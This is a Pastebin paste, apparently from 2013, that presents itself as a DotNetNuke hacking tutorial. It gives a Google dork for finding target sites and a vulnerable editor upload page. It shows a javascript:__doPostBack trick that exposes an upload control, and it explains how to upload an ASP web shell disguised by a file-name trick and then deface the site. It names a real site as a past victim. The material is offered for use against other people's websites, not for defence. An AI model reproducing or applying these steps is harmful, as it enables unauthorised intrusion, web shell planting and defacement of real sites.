xW3s13y

DNN (Dotnetnuke) Hacking tutorial by xW3s13y

Mar 31st, 2013
4,656
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.33 KB | None | 0 0
  1. DNN (Dotnetnuke) Hacking tutorial by xW3s13y
  2. DNN hacking
  3.  
  4.  
  5.  
  6. NOTE BEFORE WE START : YOU CAN USE ANY BROWSER IN STEP 1 AND 2 . BUT IF YOU ARE NOW IN STEP 3 OPEN INTERNET EXPLORER . IN INTERNET EXPLORER ADDRESS TAB . THERE YOU WILL PASTE THE javascript :__doPostBack('ctlURL$cmdUpload','') AND HIT ENTER ! DONT CLOSE THE PREVIOUS BROWSER !
  7.  
  8.  
  9. Step one: Google dork (inurl:/tabid/36/language/en-US/Default.aspx)
  10.  
  11.  
  12.  
  13. Step two: Replace /tabid/36/language/en-US/Default.aspx with
  14. /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
  15.  
  16.  
  17.  
  18. NOTE : WHEN YOU ENCOUNTER
  19. Link Gallery
  20. URL:
  21. Use selected link
  22.  
  23. FIND ANOTHER TARGET . IT MEANS ITS NOT VULN . BUT WHEN YOU SEE AN UPLOAD BUTTONS LIKE THAT ! ITS JACKPOT :D
  24.  
  25.  
  26.  
  27. Step three: Make sure you check root
  28.  
  29.  
  30.  
  31.  
  32. Step four: Place javascript code in url then enter
  33. javascript :__doPostBack('ctlURL$cmdUpload','')
  34. Delete the space after javascript
  35.  
  36.  
  37.  
  38.  
  39. Step five: Upload bar will appear, upload your asp shell.
  40.  
  41. Step six: Locate shell
  42. The shell location will be like this.
  43.  
  44.  
  45. http://www.example.com/portals/0/cmd.asp;.fun.jpg
  46.  
  47.  
  48.  
  49. Step seven: DEFACE IT . PUT YOUR DEFACEMENT PAGE IN INDEX.HTML OR CREATE AN HTML CONTAINING YOUR DEFACEMENT PAGE !
  50.  
  51. GOOD LUCK ! EXAMPLE OF HACK SITES USING THIS METHOD !
  52.  
  53.  
  54. -- http://www.seth.pt/ --- ( Hacked by Kai Zen )
  55.  
  56. `xW3s13y
Advertisement
Add Comment
Please, Sign In to add comment